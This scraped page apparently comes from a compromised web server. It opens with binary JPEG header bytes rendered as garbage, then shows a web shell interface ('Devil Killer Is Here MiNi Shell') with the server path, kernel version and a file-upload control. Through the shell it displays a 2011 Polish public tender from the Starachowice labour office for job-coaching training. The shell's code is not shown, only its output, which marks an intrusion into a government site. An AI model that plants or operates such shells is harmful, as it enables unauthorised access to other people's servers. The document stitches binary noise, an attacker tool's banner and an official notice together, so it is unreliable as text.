JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111006/323240-N-2011.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia Job-coaching w PUP w świetle znowelizowanej Ustawy i nowych standardów usług rynku pracy dla 4 pośredników pracy zatrudnionych 
w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalny pośrednik 
- dostępny Urząd współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2</b><br>
<b>Numer ogłoszenia: 323240 - 2011; data zamieszczenia: 06.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia Job-coaching w PUP w świetle znowelizowanej Ustawy i nowych standardów usług rynku pracy dla 4 pośredników pracy zatrudnionych 
w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalny pośrednik 
- dostępny Urząd współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI, Działanie 6.1, Poddziałanie 6.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia Job-coaching w PUP w świetle znowelizowanej Ustawy i nowych standardów usług rynku pracy dla 4 pośredników pracy zatrudnionych w Powiatowym Urzędzie Pracy w Starachowicach w ramach projektu: Profesjonalny pośrednik - dostępny Urząd współfinansowanego ze środków Europejskiego Funduszu Społecznego, realizowanego z Programu Operacyjnego Kapitał Ludzki - Priorytet VI  Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.2  Wsparcie powiatowych i wojewódzkich urzędów pracy w realizacji zadań na rzecz aktywizacji zawodowej osób bezrobotnych w regionie Znak sprawy: ZP/17/2011.
Kod zgodnie ze słownikiem CPV 80510000-2  

1.	Celem szkolenia jest nabycie wiedzy o możliwościach stosowania metody job-coachingu w PUP w myśl znowelizowanej Ustawy i nowych standardów.
2.	Program szkolenia musi zawierać następujące bloki tematyczne:
      -  Job-coaching  - geneza, pochodzenie i obszary stosowania metody przez pracowników   
   PUP,
     - Specjaliści usług rynku pracy w PUP jako moderatorzy drogi zawodowej osób  
  długotrwale bezrobotnych i zagrożonych wykluczeniem,
      -  Kluczowe umiejętności pracownika usług rynku pracy w PUP warunkujące skuteczność   
  job-coachingu,
     - Job-coaching, czyli plan trwałego wejścia na rynek pracy i utrzymania się na nim   
  najtrudniejszych klientów.   
3.	Szkolenie ma zostać zorganizowane i przeprowadzone do dnia 30.11.2011 r. 
4.	Proponowana liczba godzin około 20 według przedłożonego szczegółowego programu szkolenia.
5.	Czas trwania szkolenia 3 dni.
6.	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby  
zajęcia odbywały się codziennie w dni powszednie.
7.	Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz w dni 
ustawowo wolne od pracy.
8.	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. 
9.	Wykłady muszą się odbywać w sali wykładowej przystosowanej do tego typu celów.
10.	Wykonawca zapewni niezbędny sprzęt oraz pomoce dydaktyczne dla prawidłowego 
przeprowadzenia szkolenia.
11.	Wykonawca zapewni w trakcie trwania szkolenia i w miejscu zakwaterowania oraz  
 w przypadku zorganizowania transportu dla uczestników szkolenia warunki zgodne 
 z przepisami bezpieczeństwa i higieny pracy. 
12.	Wykonawca zapewni odpowiednią kadrę szkoleniową, oraz opracuje szczegółowy 
harmonogram szkolenia.
13.	Wykonawca zobowiązany jest do upowszechniania informacji poprzez oznaczenie sal wykładowych, materiałów dydaktycznych oraz wszelkiej dokumentacji związanej 
z organizacją szkolenia, że projekt jest współfinansowany ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.    
14.	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały szkoleniowe 
w formie skryptów, materiałów biurowych (przybory piśmienne, notatnik, itp.), pomoce dydaktyczne niezbędne do realizacji szkolenia oraz szczegółowy harmonogram szkolenia 
15.	Po zakończeniu szkolenia Wykonawca zamówienia wyda odpowiedni certyfikat; dyplom;  
zaświadczenie o ukończeniu szkolenia oznakowane zgodnie z Wytycznymi dotyczącymi 
oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
16.	Miejsce szkolenia oraz zakwaterowania uczestników szkolenia nie może być usytuowane 
bliżej niż 60 km i nie dalej niż 300 km od granicy miasta Starachowice.
17.	Wykonawca zapewni przewóz dla czterech uczestników szkolenia z siedziby Zamawiającego tj. Starachowice ul. Radomska 76 do miejsca szkolenia i z powrotem lub pokryje koszty związane z dojazdem czterech uczestników szkolenia ze Starachowic do miejsca szkolenia i z powrotem.   
18.	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia od pierwszego do ostatniego dnia szkolenia a w przypadku organizowania przez Wykonawcę przewozu dodatkowo na okres podróży. 
19.	Wykonawca zapewni dwa noclegi dla czterech pracowników skierowanych na szkolenie. 
20.	Uczestnicy szkolenia zostaną zakwaterowani w hotelu co najmniej dwu gwiazdkowym 
lub pensjonacie o równorzędnym standardzie w pokojach 2 lub 1 osobowych 
wyposażonych w pełny węzeł sanitarny.
21.	Wykonawca zapewni podczas trwania szkolenia całodzienne wyżywienie dla uczestników  szkolenia (2 śniadania, 3 obiady, 2 kolacje) oraz serwis kawowy podczas trwania zajęć. Posiłki mają być podawane w innej sali niż wykładowa przystosowanej do tego celu.  
22.	W przypadku braku możliwości dojazdu uczestników na miejsce szkolenia w dniu 
rozpoczęcia szkolenia Wykonawca zapewni dodatkowy nocleg zgodny z w/w opisem, dodatkową kolację w przeddzień szkolenia oraz śniadanie w dniu szkolenia. 
23.	Zajęcia dydaktyczne muszą odbywać się w miejscu zakwaterowania uczestników 
szkolenia lub w odległości nie większej niż 1 km od miejsca zakwaterowania. 
W przypadku gdy zajęcia odbywać się będą w odległości większej niż 1 km od miejsca 
zakwaterowania uczestników Wykonawca zapewni transport na i z miejsca odbywania  
zajęć.  
24.	Ostatni dzień szkolenia musi zakończyć się w godzinach umożliwiających powrót 
uczestników szkolenia do miejsca zamieszkania w dniu zakończenia szkolenia.
25.  Zamawiający przewiduje:   
      - ze strony Wykonawcy - możliwość zmiany, opiekuna grupy, kadry dydaktycznej 
      mającej prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana 
     dotyczy osoby, której kwalifikacje były punktowane przy wyborze najkorzystniejszej 
      oferty, konieczne jest by zaproponowana osoba posiadała tożsame kwalifikacje z osobą 
      której zamiana dotyczy a jej kwalifikacje muszą zostać potwierdzone poprzez złożenie  
      kserokopii stosownych dokumentów. Powyższe zmiany nie będą powodować 
      aneksowania umowy, a jedynie wymagają akceptacji przez Zamawiającego po 
      wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza zmiany 
       miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez   
      Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał Wykonawca
       w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający przewiduje   
      zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
      określonego w załącznikach oraz ofercie jednostki szkolącej pod warunkiem, że 
      wymieniony sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. 
      Zmiana ta wymaga jedynie akceptacji Zamawiającego.
       - ze strony Zamawiającego - terminu wykonania zamówienia (wcześniejsze, późniejsze 
      wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego 
       rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia Zamawiający dokona 
      zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób 
      przeszkolonych i ceny jednostkowej).
       Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników 
      szkolenia określonej w opisie przedmiotu zamówienia.
26. Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy 
       wymienionych w umowie. 
27. W przypadku zmiany wysokości podatku VAT od towarów i usług cena brutto 
       przedmiotu zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.

Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu: 
     a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
          ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru  
           lub zgłoszenia do ewidencji działalności gospodarczej. Dokument może być złożony 
          w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez 
          Wykonawcę, pełnomocnika lub osobę (osoby) upoważnioną/ne do występowania 
          w imieniu Wykonawcy zgodnie z wyciągiem z właściwego rejestru. 
     b) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi 
           oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający 
          następujące bloki tematyczne:
       -  Job-coaching  - geneza, pochodzenie i obszary stosowania metody przez pracowników 
   PUP,
      - Specjaliści usług rynku pracy w PUP jako moderatorzy drogi zawodowej osób  
  długotrwale bezrobotnych i zagrożonych wykluczeniem,
      -  Kluczowe umiejętności pracownika usług rynku pracy w PUP warunkujące skuteczność 
   job-coachingu,
      - Job-coaching, czyli plan trwałego wejścia na rynek pracy i utrzymania się na nim   
   najtrudniejszych klientów.   
     c)   harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
   projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi   
          dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    e)  wzór certyfikatu; dyplomu; zaświadczenia o ukończeniu szkolenia oznakowanego 
         zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu 
         Operacyjnego Kapitał Ludzki. 
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.
- W przypadku osób działających jako pełnomocnicy, do oferty należy dołączyć   
    pełnomocnictwo w formie oryginału lub w formie poświadczonej notarialnie kopii.
-   Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu  
    dokona odbioru zadania zleconego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
   publicznych - załącznik nr 1 do SIWZ,   
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością       
    w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia o tej 
    samej tematyce co przedmiot zamówienia.
- Na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą 
    starannością przynajmniej jednego szkolenia o tej samej tematyce co przedmiot 
    zamówienia. Dokumentem potwierdzającym przeprowadzenie szkolenia może być 
   dokument, który jednoznacznie potwierdzi należyte wykonanie usługi w przedmiocie 
    zamówienia np. list referencyjny, protokół odbioru usługi szkoleniowej itp. wydany przez 
    jednostkę, dla której Wykonawca ubiegający się o udzielenie  zamówienia przeprowadził 
    szkolenie o tej samej tematyce co przedmiot zamówienia. Dokument ten musi zawierać 
    termin jego przeprowadzenia oraz określać ilość osób uczestniczących w tym szkoleniu. 
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień 
    publicznych - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
   publicznych - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem 
   technicznym zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 2 do   
   SIWZ. W przypadku gdy jednostka szkoląca nie posiada własnej bazy szkoleniowej 
   w miejscu odbywania się szkolenia na spełnienie tego warunku należy dołączyć dodatkowo 
   np.: zobowiązanie do współpracy, umowę przedwstępną użyczenia, dzierżawy, najmu bazy  
   szkoleniowej, w której winny zostać określone: warunki lokalowe, wyposażenie sal do 
    przeprowadzenia zajęć, pomoce dydaktyczne, sprzęt techniczny.
    W przypadku braku tych zapisów w w/w dokumentach, informacje te proszę zawrzeć               
    w załączniku nr 2 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
    publicznych - załącznik nr 1 do SIWZ,    
-   Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
     przedmiotu zamówienia - załącznik nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                           dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację  
    przedmiotu zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem  podatków  
   oraz o niezaleganiu z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne 
    i społeczne, ewentualnie oświadczenie o uzyskaniu przewidzianym prawem zwolnieniu, 
   odroczeniu lub rozłożeniu na raty zaległych płatności - załącznik nr 4 do SIWZ, 
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczenia                            dołączonego do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której  
     projekt stanowi załącznik Nr 7 do niniejszej specyfikacji.
2. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu 
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
3.  Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej 
     zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, 
     czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić 
    od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
    wykonania części umowy.
4.  Zamawiający przewiduje:   
     - ze strony Wykonawcy - możliwość zmiany, opiekuna grupy, kadry dydaktycznej 
     mającej prowadzić to szkolenie. W przypadku zmiany wykładowcy, trenera  gdy zmiana 
    dotyczy osoby, której kwalifikacje były punktowane przy wyborze najkorzystniejszej 
    oferty, konieczne jest by zaproponowana osoba posiadała tożsame kwalifikacje z osobą 
    której zamiana dotyczy a jej kwalifikacje muszą zostać potwierdzone poprzez złożenie  
    kserokopii stosownych dokumentów. Powyższe zmiany nie będą powodować 
    aneksowania umowy, a jedynie wymagają akceptacji przez Zamawiającego po 
    wcześniejszym pisemnym jego powiadomieniu. Zamawiający dopuszcza zmiany 
     miejsca odbywania szkolenia pod warunkiem, że nowe miejsce szkolenia wskazane przez   
    Wykonawcę będzie usytuowane w tej samej miejscowości, którą wskazał Wykonawca
    w złożonej ofercie. Zmiana ta wymaga aneksowania umowy. Zamawiający przewiduje   
    zmianę sprzętu technicznego wykorzystywanego podczas przeprowadzania szkolenia 
    określonego w załącznikach oraz ofercie jednostki szkolącej pod warunkiem, że 
    wymieniony sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. 
    Zmiana ta wymaga jedynie akceptacji Zamawiającego.
     - ze strony Zamawiającego - terminu wykonania zamówienia (wcześniejsze, późniejsze 
    wykonanie przedmiotu zamówienia), liczby uczestników szkolenia przed jego 
     rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia Zamawiający dokona 
    zapłaty za liczbę osób faktycznie przeszkolonych (iloczyn faktycznej liczby osób 
    przeszkolonych i ceny jednostkowej).
     Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników 
    szkolenia określonej w opisie przedmiotu zamówienia.
Zamawiający przewiduje możliwość zmiany osób upoważnionych do współpracy 
wymienionych w umowie. 
    
Przed podpisaniem umowy Wykonawca jest zobowiązany dostarczyć Zamawiającemu: 
    a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  
          ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru  
          lub zgłoszenia do ewidencji działalności gospodarczej. Dokument może być złożony 
         w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez 
         Wykonawcę, pełnomocnika lub osobę (osoby) upoważnioną/ne do występowania
         w imieniu Wykonawcy zgodnie z wyciągiem z właściwego rejestru. 
    b) ramowy program szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi 
          oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki zawierający 
         następujące bloki tematyczne:
         - Job-coaching  - geneza, pochodzenie i obszary stosowania metody przez pracowników   
    PUP,
       - Specjaliści usług rynku pracy w PUP jako moderatorzy drogi zawodowej osób  
    długotrwale bezrobotnych i zagrożonych wykluczeniem,
       - Kluczowe umiejętności pracownika usług rynku pracy w PUP warunkujące skuteczność
          job-coachingu,
      - Job-coaching, czyli plan trwałego wejścia na rynek pracy i utrzymania się na nim 
   najtrudniejszych klientów.   
     c)  harmonogram szkolenia oznakowany zgodnie z Wytycznymi dotyczącymi oznaczania 
   projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    d) wzór ankiety dla uczestników szkolenia oznakowany zgodnie z Wytycznymi   
          dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
    e)  wzór certyfikatu; dyplomu; zaświadczenia o ukończeniu szkolenia oznakowanego 
         zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu 
         Operacyjnego Kapitał Ludzki. 
Nie dostarczenie tych dokumentów będzie skutkowało odstąpieniem przez Zamawiającego od podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl        W zakładce zamówienia publiczne.</p>
